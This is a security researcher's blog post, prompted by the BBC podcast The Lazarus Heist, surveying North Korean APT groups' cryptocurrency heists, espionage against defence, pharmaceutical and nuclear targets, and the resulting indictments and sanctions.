The Lazarus Heist: Where Are They Now?
The BBC World Service has recently produced The Lazarus Heist podcast (available here), researched and presented by Geoff White and Jean H. Lee. This thrilling podcast dives into the intracacies of the elaborate Bangladesh Bank heist attempt to steal $1 billion. As a security researcher that actively tracks the Lazarus group and any mentions of North Korean cyber activity, I found this podcast series was extremely detailed and well researched. There are so many additional info gems that anyone who has researched North Korea will enjoy. I also highly recommend it for any threat intelligence analysts investigating North Korean cyber activity.
The Lazarus Heist podcast also made me want to revisit what I have learned about North Korean advanced persistent threat (APT) groups. In February 2020, I blogged about who the Lazarus group is and what campaigns they are known for (see here). This was one of my first blogs and I was eager to learn more while researching this infamous APT group. I thought, therefore, I should write what I now know about the Lazarus group and the Reconnaissance General Bureua (RGB) of the Democratic People's Republic of Korea (DPRK).
Hacking the World Financial System
Cryptocurrency exchanges are a popular target for criminals. In terms of an actual heist, they represent a comparatively easier target than banks. Moreover, it is far easier for criminals to subsequently launder the funds and evade anti-fraud measures, which is often a key issue for any operation targeting financial organisations. In September 2020, Singapore-based cryptocurrency exchange KuCoin (kucoin.com) disclosed a major security breach that has resulted in the theft of hundreds of millions in Bitcoin, Ethereum and other ERC-20 tokens. Threat actors gained unauthorised access to the company systems and began stealing tokens from the hot wallets. Analysis of the blockchain linked to the cryptocurrency heist of the KuCoin exchange uncovered ties to the Lazarus group. The North Korean state-affiliated hackers reportedly stole over $275 million of cryptocurrency from the Singapore-based exchange. The attack was attributed to Lazarus due to the specific money laundering strategy the group has used in the past. Additionally, two deposit addresses to which Lazarus sent stolen funds this year also received cryptocurrency stolen in the Harvest Finance heist, suggesting the group also carried out that attack. [4, 5, 6]
North Korean hackers are some of the most persistent threats targeting the cryptocurrency vertical globally. Security researchers track North Korea's cryptocurrency group as CryptoCore, which focuses on cryptocurrency firms in Europe, the US, Israel, and Japan. CryptoCore has been linked to five attacks on cryptocurrency exchanges and has been operating since at least 2018. The first stage of the attack involves spear-phishing high-ranking individuals connected to the target organisation to establish a foothold. Once a user is compromised, CryptoCore targets the user’s password manager to steal access keys for cryptocurrency wallets and account credentials. Once the keys are obtained, they login and manually turn off two-factor authentication. Virtual funds are then immediately transferred to attacker-controlled wallets. [7, 8, 9, 10, 11]
In February 2021, CISA released a malware analysis report (MAR) on AppleJeus, a hidden backdoor concealed inside fake cryptocurrency exchange applications. The Lazarus group used AppleJeus to target organisations in over 30 countries during 2020. The backdoored applications provided initial access to its victims’ networks to steal cryptocurrency from their virtual wallets. The North Korean government has used multiple variants of AppleJeus. The earliest versions appeared in 2018. The initial infection vector varied in this campaign, such as spear-phishing via emails, malicious links sent via social media, and other social engineering techniques. 
In 2019, the Lazarus group was connected to the Trickbot banking Trojan through the use of a framework called Anchor. The Anchor project combines a collection of tools designed for targeted data extraction from secure environments and long-term persistence. Trickbot and Anchor were reportedly developed by a Russian-speaking threat group known as WizardSpider. The connection between Lazarus and WizardSpider highlights that much like common cybercriminals, these North Korean cyberspies are working with the Russian criminal underground. The Trickbot banking Trojan is one of the most advanced cybercriminal tools in the current threat landscape. It is a modular backdoor with up to 30 plugins for different attacks. It is able to perform so-called "web injects" for live credential harvesting attacks, typically targeting bank accounts for fraudulent wire transfers. The full partnership between Trickbot group and the Lazarus group is unknown, but for financially motivated state-sponsored threat actors, it is one of the most advanced tools for such operations. [13, 14, 15]
Defence Industrial Base
State-sponsored APT groups regularly attempt to infiltrate aerospace and defence sector organisations. Throughout 2020 and the first half of 2021 North Korean APTs have launched multiple campaigns targeting these sectors, dubbed Operation Interception, Operation Dream Job, and Operation North Star by private security firms. The attacks do not appear to be financially motivated. By infecting an employee’s system at one of these organisations, the attackers would be able to steal highly sensitive and important intelligence on other foreign military capabilities. Persistent access, granted by the group's custom malware, can enable the adversary to monitor communications and continually siphon intelligence from its targets. Further, by targeting potential job seekers looking to leave their current role, this could have made some victims less likely to come forward and report an issue to their current employer’s cybersecurity teams - especially if they were compromised. [18, 19, 20]
In June 2021, CISA, the FBI, and the UK NCSC issued a joint security advisory regarding cyber threat actors from the DPRK targeting a number of pharmaceuticals, vaccine, and virology organisations, affiliated with Operation Warp Speed (OWS). As a follow up to the joint advisory, CISA and the FBI have shared further details regarding an intrusion in October 2020. There was a confirmed Lazarus attack on a US-based pharmaceutical company working on a vaccine for the SARS-CoV-2 variant of COVID-19. Kaspersky researchers also disclosed that in September 2020, Lazarus operators targeted a pharmaceutical company and, in October, the APT group went after a government ministry related to the COVID-19 response. [21 ,22]
The Lazarus group also targeted individual staff members at Operation Warp Speed entities via social media sites, such as LinkedIn, as well as corporate or personal email accounts. Fictitious job opportunities have been used to engage targets in conversations on private messaging apps; having built trust with the target, the threat actors send job-themed malicious documents which attempt to connect to a malicious URL that downloads malware onto the victim’s computer. After the initial compromise, the attackers work quickly to exfiltrate targeted information. This can take as little as a few days.
In February 2021, a member of the South Korean parliament’s intelligence committee claimed that North Korean cyber spies targeted Pfizer to obtain COVID-19 vaccine technology. Pfizer stated it would not comment on the matter. In November 2020, Reuters shared an exclusive report detailing the attacks launched by North Korean cyber operatives against British drugmaker, AstraZeneca. [23, 24]
The DPRK RGB groups are continuously launching intelligence gathering campaigns as part of North Korea's weapons of mass destruction (WMD) development programme. In June 2021, South Korean officials reported that North Korean hackers breached the internal network of the South Korean Atomic Energy Research Institute (KAERI), the government organisation that conducts research on nuclear power and nuclear fuel technology. The intrusion took place in May 2021, through a vulnerability in a virtual private network (VPN) server. These attacks were attributed to Kimsuky, another APT group that reportedly belongs to the DPRK RGB. 
In May 2020, South Korean security firm, ESTsecurity, disclosed disclosed a new cyber-espionage campaign linked to Konni, another North Korean APT. The group has been observed impersonating CISAC, an academic research foundation dealing with nuclear issues, in phishing lures. The researchers also noted that the payload used in this attack has also been implanted into malicious documents impersonating the 'North Korea Central Committee Conference' and '2020 Tokyo Paralympics'. 
Further, in September 2019, the US Treasury Department sanctioned three North Korean hacking groups (Lazarus, Andariel, Bluenoroff) for hacks aimed at stealing funds to funnel back into the country’s nuclear weapons and missile programs. 
APT37 is thought to be a North Korean group that specialises in targeting defectors of the regime, particularly in South Korea. In November 2019, ESTsecurity identified suspected APT37 attacks using mobile malware against North Korean defectors living abroad. A malicious app was being distributed from a website masquerading as a sponsored fundraising effort for North Korean defectors. Notably, the app was advertised as a "secure messaging app", dubbed Dragon Messenger. The fake website was built with WordPress and contained a link to the official Google Play Store for the Dragon Messenger; when downloaded, the app is used for communicating on WiFi-only, not through the SIM. The app attempts to read SMS messages on victims' devices, exfiltrate the contact list, and record calls. 
In March 2020, ESTsecurity has uncovered a new APT37 campaign, dubbed Operation SpyCloud due to the use of Google Cloud services in spear-phishing attacks. Attribution was made to APT37 because of the deployment of the ROKRAT malware family, primarily agianst targets in South Korea, but also against Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. Many of the attacks targeted foreign, unification, and security workers, heads of organisations related to North Korea, and North Korean defectors. [30, 31]
0day vulnerabilities are one of the most valuable assets for APT campaigns, deemed by intelligence agencies as cyber-weapons. In January 2021, Google’s Threat Analysis Group (TAG) has disclosed a new campaign targeting security researchers working on vulnerability research. TAG attributed this campaign to a government-backed entity based in North Korea. 
Indictments & Sanctions
In September 2018 and again in February 2021, the US Department of Justice indicted North Korean operatives for hacking campaigns. In March 2020, the US Treasury's Office of Foreign Assets Control (OFAC) has recently sanctioned two Chinese nationals involved in laundering stolen cryptocurrency from several cyber intrusions carried out by the Lazarus group. [40, 41, 42]
Although the likelihood of the US ever arresting these individuals is incredibly low, these indictment aim to “refine the attribution of this crime spree to the DPRK military intelligence services, specifically the Reconnaissance General Bureau (RGB)”. The regime has become a “criminal syndicate with a flag", according to the DOJ indictment, which claims North Korea "harnesses its state resources to steal hundreds of millions of dollars.”
In March 2019, the United Nations (UN) DPRK Panel of Experts found that this illicit behaviour generates substantial revenue for North Korea. The country's regime can use these funds for its nuclear weapons and ballistic missile programs, prohibited by the UN. This activity also poses a significant operational risk to the financial services sector and erodes the integrity of the financial system. 
In July 2020, the US army also published a report detailing tactics used by North Korea, including those used by the country's cyber threat actors. This report is being used to train US troops and military leaders and lists various information about the Korean People's Army (KPA), including military tactics, weapons arsenal, leadership structure, troop types, logistics, and electronic warfare capabilities. 
The Lazarus group continues to conduct well-planned, disciplined, and methodical cyber-operations more akin to espionage than standard cybercrime.